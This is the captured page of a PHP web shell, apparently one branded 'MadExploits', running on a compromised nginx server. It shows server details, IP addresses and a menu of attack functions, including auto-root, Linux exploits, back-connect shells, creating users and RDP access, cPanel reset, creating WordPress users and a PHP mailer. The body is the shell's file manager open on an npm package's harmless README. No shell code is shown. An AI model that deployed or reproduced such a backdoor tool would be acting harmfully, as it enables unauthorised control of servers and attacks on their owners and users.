Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.1
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
quiz1 /
node_modules /
data-view-buffer /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
dr-xr-xr-x
test
[ DIR ]
dr-xr-xr-x
.eslintrc
184
B
-rw-rw-rw-
.nycrc
216
B
-rw-rw-rw-
CHANGELOG.md
1.23
KB
-rw-rw-rw-
LICENSE
1.05
KB
-rw-rw-rw-
README.md
1.9
KB
-rw-rw-rw-
index.d.ts
144
B
-rw-rw-rw-
index.js
494
B
-rw-rw-rw-
package.json
2.26
KB
-rw-rw-rw-
tsconfig.json
3.12
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# data-view-buffer <sup>[![Version Badge][npm-version-svg]][package-url]</sup> [![github actions][actions-image]][actions-url] [![coverage][codecov-image]][codecov-url] [![License][license-image]][license-url] [![Downloads][downloads-image]][downloads-url] [![npm badge][npm-badge-png]][package-url] Get the ArrayBuffer out of a DataView, robustly. This will work in node <= 0.10 and < 0.11.4, where there's no prototype accessor, only a nonconfigurable own property. It will also work in modern engines where `DataView.prototype.buffer` has been deleted after this module has loaded. ## Example ```js const dataViewBuffer = require('data-view-buffer'); const assert = require('assert'); const ab = new ArrayBuffer(0); const dv = new DataView(ab); assert.equal(dataViewBuffer(dv), ab); ``` ## Tests Simply clone the repo, `npm install`, and run `npm test` [package-url]: https://npmjs.org/package/data-view-buffer [npm-version-svg]: https://versionbadg.es/ljharb/data-view-buffer.svg [deps-svg]: https://david-dm.org/ljharb/data-view-buffer.svg [deps-url]: https://david-dm.org/ljharb/data-view-buffer [dev-deps-svg]: https://david-dm.org/ljharb/data-view-buffer/dev-status.svg [dev-deps-url]: https://david-dm.org/ljharb/data-view-buffer#info=devDependencies [npm-badge-png]: https://nodei.co/npm/data-view-buffer.png?downloads=true&stars=true [license-image]: https://img.shields.io/npm/l/data-view-buffer.svg [license-url]: LICENSE [downloads-image]: https://img.shields.io/npm/dm/data-view-buffer.svg [downloads-url]: https://npm-stat.com/charts.html?package=data-view-buffer [codecov-image]: https://codecov.io/gh/ljharb/data-view-buffer/branch/main/graphs/badge.svg [codecov-url]: https://app.codecov.io/gh/ljharb/data-view-buffer/ [actions-image]: https://img.shields.io/endpoint?url=https://github-actions-badge-u3jn4tfpocch.runkit.sh/ljharb/data-view-buffer [actions-url]: https://github.com/ljharb/data-view-buffer/actions
Close